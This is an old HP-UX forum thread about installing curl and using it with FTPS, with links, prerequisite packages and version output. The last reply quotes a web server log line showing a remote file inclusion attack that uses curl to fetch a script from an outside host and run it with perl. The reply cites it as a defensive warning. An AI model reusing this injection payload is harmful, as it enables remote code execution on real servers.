- Community Home
- >
- Servers and Operating Systems
- >
- Operating Systems
- >
- Operating System - HP-UX
- >
- Re: anyone using curl?
Categories
Company
Local Language
Forums
Discussions
Forums
- Data Protection and Retention
- Entry Storage Systems
- Legacy
- Midrange and Enterprise Storage
- Storage Networking
- HPE Nimble Storage
Discussions
Forums
Discussions
Discussions
Discussions
Forums
Discussions
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
- BladeSystem Infrastructure and Application Solutions
- Appliance Servers
- Alpha Servers
- BackOffice Products
- Internet Products
- HPE 9000 and HPE e3000 Servers
- Networking
- Netservers
- Secure OS Software for Linux
- Server Management (Insight Manager 7)
- Windows Server 2003
- Operating System - Tru64 Unix
- ProLiant Deployment and Provisioning
- Linux-Based Community / Regional
- Microsoft System Center Integration
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Discussion Boards
Community
Resources
Forums
Blogs
- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
04-19-2006 04:15 AM
04-19-2006 04:15 AM
anyone using curl?
Anyone out there using curl? If so could would you mind providing some examples as to how to use curl with ftps?
Thank you in advance!
wvsa
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
04-19-2006 05:03 AM
04-19-2006 05:03 AM
Re: anyone using curl?
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
04-19-2006 05:12 AM
04-19-2006 05:12 AM
Re: anyone using curl?
http://curl.haxx.se/mail/archive-2003-12/0005.html
live free or die
harry d brown jr
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
04-19-2006 07:19 AM
04-19-2006 07:19 AM
Re: anyone using curl?
Any standard curl command, for example the ones given on RedHat's site to download iso's will work with an HP-UX curl port.
I hope this is not the same location for curl as Harry's if so, sorry, I'm typing fast:
http://hpux.connect.org.uk/hppd/hpux/Networking/WWW/curl-7.15.3/
curl should be part of HP's Internet Express port.
http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXIEXP1111
I recommned using Internet Express over the Porting and Archive Center because HP has actually done decent quality assurance testing on the port.
SEP
Owner of ISN Corporation
http://isnamerica.com
http://hpuxconsulting.com
Sponsor: http://hpux.ws
Twitter: http://twitter.com/hpuxlinux
Founder http://newdatacloud.com
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
04-19-2006 07:21 PM
04-19-2006 07:21 PM
Re: anyone using curl?
a) Number of my clients at HP use it.
Last week, I installed it for a large
beer and vine company on HP-UX servers
here in Australia.
b) Note the following pre-requsistes:
libidn-0.5.20-hppa-11.11.depot
libgcc-4.1.0-hppa-11.11.depot
gettext-0.14.5-hppa-11.11.depot
libiconv-1.10-hppa-11.11.depot
openssl-0.9.8a-hppa-11.11.depot
zlib-1.2.3-hppa-11.11.depot
curl-7.15.3-hppa-11.11.depot
c) Otherwise, the bundles install perfectly well:
# curl -V
curl 7.15.3 (hppa2.0w-hp-hpux11.11) libcurl/7.15.3 OpenSSL/0.9.8a zlib/1.2.3 libidn/0.5.20
Protocols: tftp ftp telnet dict ldap http file https ftps
Features: IDN Largefile NTLM SSL libz
VK2COT
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
04-20-2006 12:56 AM
04-20-2006 12:56 AM
Re: anyone using curl?
196.22.136.110 - - [09/Apr/2006:23:48:11 -0700] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://erod11.tripod.com/tool.gif?&cmd=cd%20/tmp/;curl%20-O%20http://erod11.tripod.com/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 200 16
If you run a webserver - I would move it (and wget) to a non default PATH.
Rgds...Geoff